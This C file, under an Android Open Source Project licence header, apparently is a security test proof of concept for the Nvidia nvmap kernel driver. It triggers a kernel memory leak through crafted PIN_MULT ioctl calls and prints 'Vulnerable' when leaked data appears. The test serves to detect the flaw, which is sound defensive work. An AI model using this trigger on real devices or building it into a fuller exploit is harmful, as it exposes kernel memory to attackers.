1 /*
2 * Copyright (C) 2017 The Android Open Source Project
3 *
4 * Licensed under the Apache License, Version 2.0 (the "License");
5 * you may not use this file except in compliance with the License.
6 * You may obtain a copy of the License at
7 *
8 * http://www.apache.org/licenses/LICENSE-2.0
9 *
10 * Unless required by applicable law or agreed to in writing, software
11 * distributed under the License is distributed on an "AS IS" BASIS,
12 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13 * See the License for the specific language governing permissions and
14 * limitations under the License.
15 */
16 #define _GNU_SOURCE
17 #include <unistd.h>
18 #include <errno.h>
19 #include <stdio.h>
20 #include <dirent.h>
21 #include <string.h>
22 #include <sys/stat.h>
23 #include <sys/ioctl.h>
24 #include <stdio.h>
25 #include <string.h>
26 #include <dlfcn.h>
27 #include <sys/time.h>
28 #include <sys/mman.h>
29 #include <sys/syscall.h>
30 #include <sys/resource.h>
31 #include <fcntl.h>
32 #include <pthread.h>
33 #include <unistd.h>
34 #include <sched.h>
35
36
37 struct nvmap_handle_param {
38 __u32 handle; /* nvmap handle */
39 __u32 param; /* size/align/base/heap etc. */
40 unsigned long result; /* returns requested info*/
41 };
42
43 struct nvmap_create_handle {
44 union {
45 __u32 id; /* FromId */
46 __u32 size; /* CreateHandle */
47 __s32 fd; /* DmaBufFd or FromFd */
48 };
49 __u32 handle; /* returns nvmap handle */
50 };
51
52 struct nvmap_pin_handle {
53 __u32 *handles; /* array of handles to pin/unpin */
54 unsigned long *addr; /* array of addresses to return */
55 __u32 count; /* number of entries in handles */
56 };
57
58 struct nvmap_alloc_handle {
59 __u32 handle; /* nvmap handle */
60 __u32 heap_mask; /* heaps to allocate from */
61 __u32 flags; /* wb/wc/uc/iwb etc. */
62 __u32 align; /* min alignment necessary */
63 };
64
65 struct nvmap_pin_handle_32 {
66 __u32 handles; /* array of handles to pin/unpin */
67 __u32 addr; /* array of addresses to return */
68 __u32 count; /* number of entries in handles */
69 };
70
71 struct nvmap_map_caller_32 {
72 __u32 handle; /* nvmap handle */
73 __u32 offset; /* offset into hmem; should be page-aligned */
74 __u32 length; /* number of bytes to map */
75 __u32 flags; /* maps as wb/iwb etc. */
76 __u32 addr; /* user pointer*/
77 };
78
79 #define NVMAP_IOC_MAGIC 'N'
80 #define NVMAP_IOC_CREATE _IOWR(NVMAP_IOC_MAGIC, 0, struct nvmap_create_handle)
81 #define NVMAP_IOC_PIN_MULT _IOWR(NVMAP_IOC_MAGIC, 10, struct nvmap_pin_handle)
82 #define NVMAP_IOC_ALLOC _IOW(NVMAP_IOC_MAGIC, 3, struct nvmap_alloc_handle)
83 #define NVMAP_IOC_PIN_MULT_32 _IOWR(NVMAP_IOC_MAGIC, 10, struct nvmap_pin_handle_32)
84 #define NVMAP_IOC_MMAP_32 _IOWR(NVMAP_IOC_MAGIC, 5, struct nvmap_map_caller_32)
85
86 /* common carveout heaps */
87 #define NVMAP_HEAP_CARVEOUT_IRAM (1ul<<29)
88 #define NVMAP_HEAP_CARVEOUT_VPR (1ul<<28)
89 #define NVMAP_HEAP_CARVEOUT_TSEC (1ul<<27)
90 #define NVMAP_HEAP_CARVEOUT_GENERIC (1ul<<0)
91
92 #define NVMAP_HEAP_CARVEOUT_MASK (NVMAP_HEAP_IOVMM - 1)
93
94 /* allocation flags */
95 #define NVMAP_HANDLE_UNCACHEABLE (0x0ul << 0)
96 #define NVMAP_HANDLE_WRITE_COMBINE (0x1ul << 0)
97 #define NVMAP_HANDLE_INNER_CACHEABLE (0x2ul << 0)
98 #define NVMAP_HANDLE_CACHEABLE (0x3ul << 0)
99 #define NVMAP_HANDLE_CACHE_FLAG (0x3ul << 0)
100
101 #define NVMAP_HANDLE_SECURE (0x1ul << 2)
102 #define NVMAP_HANDLE_KIND_SPECIFIED (0x1ul << 3)
103 #define NVMAP_HANDLE_COMPR_SPECIFIED (0x1ul << 4)
104 #define NVMAP_HANDLE_ZEROED_PAGES (0x1ul << 5)
105 #define NVMAP_HANDLE_PHYS_CONTIG (0x1ul << 6)
106 #define NVMAP_HANDLE_CACHE_SYNC (0x1ul << 7)
107
108
109 int g_fd = -1;
110
open_driver()111 int open_driver() {
112 char* dev_path = "/dev/nvmap";
113 g_fd = open(dev_path, O_RDWR);
114 return g_fd;
115 }
116
117
main(int argc,char ** argv)118 int main(int argc, char**argv) {
119 if (open_driver() < 0) {
120 return -1;
121 }
122
123 int i;
124 int* handles = mmap((void*)0x20000000, 0x1000, PROT_READ | PROT_WRITE , MAP_FIXED | MAP_SHARED | MAP_ANONYMOUS, -1, 0);
125 memset(handles, 0x42, 0x1000);
126 for (i = 0; i < 2; ++i) {
127 struct nvmap_create_handle op = {0};
128 op.size = 0x1000;
129 ioctl(g_fd, NVMAP_IOC_CREATE, &op);
130 handles[i] = op.handle;
131 struct nvmap_alloc_handle alloc = {0};
132 alloc.align = 0x1000;
133 alloc.handle = op.handle;
134 alloc.heap_mask = NVMAP_HEAP_CARVEOUT_GENERIC;
135 alloc.flags = NVMAP_HANDLE_ZEROED_PAGES;
136 ioctl(g_fd, NVMAP_IOC_ALLOC, &alloc);
137 }
138
139 void* leak_addr = (void*) 0x10001000;
140 void* mmap_addr = mmap(leak_addr, 0x1000, PROT_READ | PROT_WRITE , MAP_FIXED | MAP_SHARED | MAP_ANONYMOUS, -1, 0);
141 memset(leak_addr, 0x41, 0x1000);
142
143 unsigned long leaked_data = 0;
144 struct nvmap_pin_handle_32 pin = {0};
145 pin.count = 2;
146 pin.handles = (unsigned int) handles;
147 struct nvmap_pin_handle err_pin = {0};
148 err_pin.count = 0;
149 err_pin.handles = handles;
150 err_pin.addr = leak_addr + 8;
151
152 ioctl(g_fd, NVMAP_IOC_PIN_MULT, &err_pin); // construct op.addr
153 ioctl(g_fd, NVMAP_IOC_PIN_MULT_32, &pin);
154
155 for (i = 0; i < 10; ++i) {
156 if(((int*)leak_addr)[i] != 0x41414141 && 0 == leaked_data) {
157 leaked_data = (unsigned long)((int*)leak_addr) + i;
158 }
159 }
160
161 if (leaked_data) {
162 printf("Vulnerable");
163 }
164 return 0;
165 }
166